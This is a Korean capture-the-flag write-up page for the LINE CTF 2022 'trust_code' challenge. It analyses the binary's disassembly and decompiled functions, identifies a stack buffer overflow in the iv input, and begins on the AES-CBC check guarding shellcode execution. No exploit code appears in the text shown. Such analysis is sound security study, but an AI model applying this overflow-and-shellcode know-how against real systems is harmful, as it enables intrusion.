<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 6.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css" integrity="sha256-DfWjNxDkM94fVBWx1H5BMMp0Zq7luBlV8QRcSES7s+0=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"juhyun167.github.io","root":"/","images":"/images","scheme":"Muse","darkmode":true,"version":"8.12.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="개요 chall.zip 문제 분석           주의사항     이 글의 내용을 이해하기 위해서는 C++ 예외 처리의 내부 구현에 대한 지식이 필요합니다.       64비트 x86_64 바이너리 trust_code 와 Dockerfile 등이 주어집니다. Dockerfile 을 비롯한 컨테이너 관련 파일은 원본 문제에는 없는 파일로, 대회 환경을 구현">
<meta property="og:type" content="article">
<meta property="og:title" content="[LINE CTF 2022] trust_code">
<meta property="og:url" content="https://juhyun167.github.io/2022/07/30/line22-trust-code/index.html">
<meta property="og:site_name" content="JUHYUN167">
<meta property="og:description" content="개요 chall.zip 문제 분석           주의사항     이 글의 내용을 이해하기 위해서는 C++ 예외 처리의 내부 구현에 대한 지식이 필요합니다.       64비트 x86_64 바이너리 trust_code 와 Dockerfile 등이 주어집니다. Dockerfile 을 비롯한 컨테이너 관련 파일은 원본 문제에는 없는 파일로, 대회 환경을 구현">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://juhyun167.github.io/images/line22-trust-code/1.png">
<meta property="article:published_time" content="2022-07-30T23:07:19.000Z">
<meta property="article:modified_time" content="2023-02-28T03:51:54.925Z">
<meta property="article:author" content="juhyun167 블로그">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://juhyun167.github.io/images/line22-trust-code/1.png">


<link rel="canonical" href="https://juhyun167.github.io/2022/07/30/line22-trust-code/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://juhyun167.github.io/2022/07/30/line22-trust-code/","path":"2022/07/30/line22-trust-code/","title":"[LINE CTF 2022] trust_code"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>[LINE CTF 2022] trust_code | JUHYUN167</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-2NL1HJ159T"></script>
  <script class="next-config" data-name="google_analytics" type="application/json">{"tracking_id":"G-2NL1HJ159T","only_pageview":false}</script>
  <script src="/js/third-party/analytics/google-analytics.js"></script>




<!-- custom fonts -->
<link rel="stylesheet" as="style" crossorigin href="https://cdn.jsdelivr.net/gh/orioncactus/pretendard/dist/web/static/pretendard-dynamic-subset.css" />
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto+Mono:wght@400;700&display=swap" rel="stylesheet">

<!-- google search console -->
<meta name="google-site-verification" content="pV2zNbKpqSdeajzc7IIefYq62vg-J9PCZfCvLKwnYF8" />
<!-- naver search advisor -->
<meta name="naver-site-verification" content="e4b3b4646981d90b2cfdab4014543ed9338b4e57" />

  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
<link rel="alternate" href="/rss2.xml" title="JUHYUN167" type="application/rss+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
    </div>
  </div>

  <div class="site-meta">
      <img class="custom-logo-image" src="/images/custom-logo.png" alt="JUHYUN167">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">JUHYUN167</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">juhyun167 blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>
<!-- load header custom script -->
<script src="/scripts/header.js"></script>

</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">juhyun167 블로그</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span>
      </div>
  </nav>
</div>


<ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Computer-Science/">Computer Science</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Computer-Science/Data-Structures/">Data Structures</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Security/">Security</a><span class="category-list-count">8</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/Security/CTF/">CTF</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Security/Reverse-Engineering/">Reverse Engineering</a><span class="category-list-count">3</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/Thoughts/">Thoughts</a><span class="category-list-count">3</span></li></ul>

<!-- load sidebar custom script -->
<script src="/scripts/sidebar.js"></script>

        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://juhyun167.github.io/2022/07/30/line22-trust-code/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="juhyun167 블로그">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="JUHYUN167">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="[LINE CTF 2022] trust_code | JUHYUN167">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [LINE CTF 2022] trust_code
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2022-07-30 23:07:19" itemprop="dateCreated datePublished" datetime="2022-07-30T23:07:19+00:00">2022-07-30</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">Edited on</span>
      <time title="Modified: 2023-02-28 03:51:54" itemprop="dateModified" datetime="2023-02-28T03:51:54+00:00">2023-02-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Security/" itemprop="url" rel="index"><span itemprop="name">Security</span></a>
        </span>
          , 
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Security/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="%EA%B0%9C%EC%9A%94" tabindex="-1">개요</h2>
<p><a href="/uploads/line22-trust-code/chall.zip">chall.zip</a></p>
<h2 id="%EB%AC%B8%EC%A0%9C-%EB%B6%84%EC%84%9D" tabindex="-1">문제 분석</h2>
<blockquote class="callout-warning">
    <p>
    <strong>주의사항</strong><br>
    이 글의 내용을 이해하기 위해서는 C++ 예외 처리의 <a href="/2022/07/17/cpp-exception-handling/">내부 구현</a>에 대한 지식이 필요합니다.
    </p>
</blockquote>
<p>64비트 x86_64 바이너리 <code>trust_code</code> 와 <code>Dockerfile</code> 등이 주어집니다. <code>Dockerfile</code> 을 비롯한 컨테이너 관련 파일은 원본 문제에는 없는 파일로, 대회 환경을 구현하기 위해 작성하였습니다. <code>secret_key.txt</code> 는 서버에만 있어야 하는 파일로, 대회 참가자에게 배포되지 않습니다. 바이너리는 심볼이 있고, Canary, NX, PIE 보호 기법이 적용되어 있습니다.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ checksec trust_code</span><br><span class="line">[*] <span class="string">&#x27;/home/user/study/ctf/line22/trust_code/trust_code&#x27;</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      PIE enabled</span><br></pre></td></tr></table></figure>
<p>바이너리를 실행하면 iv와 code를 입력받으며, 아무 문자열이나 입력했더니 에러 메시지를 출력하고 종료합니다.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">./trust_code</span><br><span class="line">iv&gt; aaaa</span><br><span class="line">code&gt; aaaa</span><br><span class="line"></span><br><span class="line">= Executed =</span><br><span class="line"></span><br><span class="line">Sorry for the inconvenience, there was a problem while decrypting code.</span><br></pre></td></tr></table></figure>
<p><code>main</code> 함수의 디컴파일 결과를 보면 다음과 같이 단순합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">  launch();</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>그런데 디스어셈블 결과를 보면 <code>__cxa_begin_catch</code> , <code>__cxa_end_catch</code> 함수를 호출하는 부분이 있습니다. 이는 예외 처리에서 사용되는 랜딩 패드 중 catch 블록을 나타냅니다. 내부에서는 <code>puts</code> 함수로 앞서 보았던 에러 메시지를 출력하고 있습니다.</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001860</span> <span class="comment">; int __cdecl main(int argc, const char **argv, const char **envp)</span></span><br><span class="line"><span class="comment">; ...</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001860</span> <span class="comment">; __unwind &#123; // __gxx_personality_v0</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001860</span>                 <span class="keyword">sub</span>     <span class="built_in">rsp</span>, <span class="number">28h</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001864</span>                 <span class="keyword">mov</span>     <span class="built_in">rax</span>, <span class="built_in">fs</span>:<span class="number">28h</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">000000000000186D</span>                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_8], <span class="built_in">rax</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001872</span>                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_C], <span class="number">0</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000187A <span class="comment">;   try &#123;</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000187A                 <span class="keyword">call</span>    _Z6launchv      <span class="comment">; launch(void)</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000187A <span class="comment">;   &#125; // starts at 187A</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000187F                 <span class="keyword">jmp</span>     $+<span class="number">5</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001884</span> <span class="comment">; ---------------------------------------------------------------------------</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001884</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001884</span> loc_1884:                               <span class="comment">; CODE XREF: main+1F↑j</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001884</span>                 <span class="keyword">jmp</span>     loc_18E0</span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001889</span> <span class="comment">; ---------------------------------------------------------------------------</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001889</span> <span class="comment">;   catch(...) // owned by 187A</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001889</span>                 <span class="keyword">mov</span>     <span class="built_in">rcx</span>, <span class="built_in">rax</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000188C                 <span class="keyword">mov</span>     <span class="built_in">eax</span>, <span class="built_in">edx</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000188E                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_18], <span class="built_in">rcx</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001893</span>                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_1C], <span class="built_in">eax</span></span><br><span class="line"><span class="symbol">.text:</span><span class="number">0000000000001897</span>                 <span class="keyword">mov</span>     <span class="built_in">rdi</span>, [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_18] <span class="comment">; void *</span></span><br><span class="line"><span class="symbol">.text:</span>000000000000189C                 <span class="keyword">call</span>    ___cxa_begin_catch</span><br><span class="line"><span class="symbol">.text:</span>00000000000018A1                 <span class="keyword">mov</span>     <span class="built_in">cs</span>:loop_cont, <span class="number">0</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018AB <span class="comment">;   try &#123;</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018AB                 <span class="keyword">lea</span>     <span class="built_in">rdi</span>, s          <span class="comment">; &quot;\nSorry for the inconvenience, there wa&quot;...</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018B2                 <span class="keyword">call</span>    _puts</span><br><span class="line"><span class="symbol">.text:</span>00000000000018B2 <span class="comment">;   &#125; // starts at 18AB</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018B7                 <span class="keyword">jmp</span>     $+<span class="number">5</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018BC <span class="comment">; ---------------------------------------------------------------------------</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018BC</span><br><span class="line"><span class="symbol">.text:</span>00000000000018BC loc_18BC:                               <span class="comment">; CODE XREF: main+57↑j</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018BC                 <span class="keyword">xor</span>     <span class="built_in">edi</span>, <span class="built_in">edi</span>        <span class="comment">; status</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018BE                 <span class="keyword">call</span>    _exit</span><br><span class="line"><span class="symbol">.text:</span>00000000000018C3 <span class="comment">; ---------------------------------------------------------------------------</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018C3 <span class="comment">;   cleanup() // owned by 18AB</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018C3                 <span class="keyword">mov</span>     <span class="built_in">rcx</span>, <span class="built_in">rax</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018C6                 <span class="keyword">mov</span>     <span class="built_in">eax</span>, <span class="built_in">edx</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018C8                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_18], <span class="built_in">rcx</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018CD                 <span class="keyword">mov</span>     [<span class="built_in">rsp</span>+<span class="number">28h</span>+var_1C], <span class="built_in">eax</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018D1 <span class="comment">;   try &#123;</span></span><br><span class="line"><span class="symbol">.text:</span>00000000000018D1                 <span class="keyword">call</span>    ___cxa_end_catch</span><br><span class="line"><span class="symbol">.text:</span>00000000000018D1 <span class="comment">;   &#125; // starts at 18D1</span></span><br></pre></td></tr></table></figure>
<p>따라서 <code>main</code> 함수의 소스 코드는 사실 다음과 같아야 합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        launch();</span><br><span class="line">    &#125; catch (<span class="type">const</span> <span class="built_in">std</span>::exception&amp; e) &#123;</span><br><span class="line">        <span class="built_in">puts</span>(<span class="string">&quot;Sorry for the inconvenience, there was a problem while decrypting&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>launch</code> 함수는 <code>secret_key.txt</code> 파일의 내용을 읽어 배열 <code>buf</code> 에 저장합니다. 이후 <code>buf</code> 의 내용을 전역 배열 <code>secret_key</code> 에 대입한 후 <code>service</code> 함수를 호출합니다. <code>buf</code> 배열의 크기에서 <code>secret_key</code> 의 길이는 16바이트임을 알 수 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">launch</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> fd; <span class="comment">// [rsp+1Ch] [rbp-2Ch]</span></span><br><span class="line">  <span class="type">char</span> buf[<span class="number">16</span>]; <span class="comment">// [rsp+30h] [rbp-18h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+40h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  *(_OWORD *)buf = <span class="number">0LL</span>;</span><br><span class="line">  alarm(<span class="number">30u</span>);</span><br><span class="line">  signal(<span class="number">14</span>, alarm_handler);</span><br><span class="line">  setvbuf(<span class="built_in">stdin</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  setvbuf(<span class="built_in">stdout</span>, <span class="number">0LL</span>, <span class="number">2</span>, <span class="number">0LL</span>);</span><br><span class="line">  fd = open(<span class="string">&quot;secret_key.txt&quot;</span>, <span class="number">0</span>);</span><br><span class="line">  read(fd, buf, <span class="number">16uLL</span>);</span><br><span class="line">  close(fd);</span><br><span class="line">  *(_OWORD *)secret_key = *(_OWORD *)buf;</span><br><span class="line">  service();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>service</code> 함수는 배열 <code>buf</code> 에 iv를 입력받고, 동일하게 <code>buf</code> 의 내용을 전역 배열 <code>iv</code> 에 대입한 후 <code>loop</code> 함수를 호출합니다. 그런데 입력받는 길이가 배열의 크기보다 큰 32바이트로 스택 버퍼 오버플로우가 발생합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">service</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">16</span>]; <span class="comment">// [rsp+10h] [rbp-18h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v1; <span class="comment">// [rsp+20h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v1 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;iv&gt; &quot;</span>);</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">32uLL</span>);                          <span class="comment">// buffer overflow!</span></span><br><span class="line">  *(_OWORD *)iv = *(_OWORD *)buf;</span><br><span class="line">  loop();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>loop</code> 함수는 <code>loop_cont</code> 값이 참이면 <code>run</code> 함수를 반복하여 호출합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">loop</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">while</span> ( loop_cont )</span><br><span class="line">    run();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>run</code> 함수는 <code>read_code</code> 함수를 호출하여 <code>code</code> 포인터를 반환받습니다. 이후 <code>&amp;code[16]</code> 부터 32바이트를 <code>sc.code</code> 로 복사하고 <code>execute</code> 함수를 호출합니다. <code>sc</code> 는 <code>Shellcode</code> 타입의 객체로, 32바이트 크기의 배열인 <code>code</code> 를 유일한 필드로 가지고 있습니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">unsigned</span> __int64 <span class="title function_">run</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  __int128 v0; <span class="comment">// xmm0</span></span><br><span class="line">  <span class="type">char</span> *code; <span class="comment">// [rsp+18h] [rbp-30h]</span></span><br><span class="line">  Shellcode sc; <span class="comment">// [rsp+20h] [rbp-28h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v4; <span class="comment">// [rsp+40h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  code = read_code();</span><br><span class="line">  v0 = *((_OWORD *)code + <span class="number">1</span>);</span><br><span class="line">  *(_OWORD *)&amp;sc.code[<span class="number">16</span>] = *((_OWORD *)code + <span class="number">2</span>);</span><br><span class="line">  *(_OWORD *)sc.code = v0;</span><br><span class="line">  execute((<span class="type">unsigned</span> __int8 *)&amp;sc);</span><br><span class="line">  Shellcode::~Shellcode(&amp;sc);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>read_code</code> 함수는 48바이트의 code를 배열 <code>buf</code> 에 입력받습니다. 이후 <code>buf</code> 를 인자로 하여 <code>decrypt</code> 함수를 호출하고 포인터를 반환받아 반환합니다.</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *<span class="title function_">read_code</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">48</span>]; <span class="comment">// [rsp+20h] [rbp-38h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v2; <span class="comment">// [rsp+50h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;code&gt; &quot;</span>);</span><br><span class="line">  <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line">  read(<span class="number">0</span>, buf, <span class="number">48uLL</span>);</span><br><span class="line">  <span class="keyword">return</span> decrypt((<span class="type">unsigned</span> __int8 *)buf);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>decrypt</code> 함수는 인자로 주어진 문자열을 <code>key</code> 와 <code>iv</code> 를 이용해 AES-CBC로 복호화합니다. 인자는 <code>read_code</code> 에서 입력받는 code이므로, 애초에 code는 암호문임을 알 수 있습니다. 복호화된 평문은 <code>out</code> 에 저장되는데, <code>out</code> 의 상위 16바이트가 <code>&quot;TRUST_CODE_ONLY!&quot;</code> 가 아니면 예외를 발생시키고 있습니다.</p>
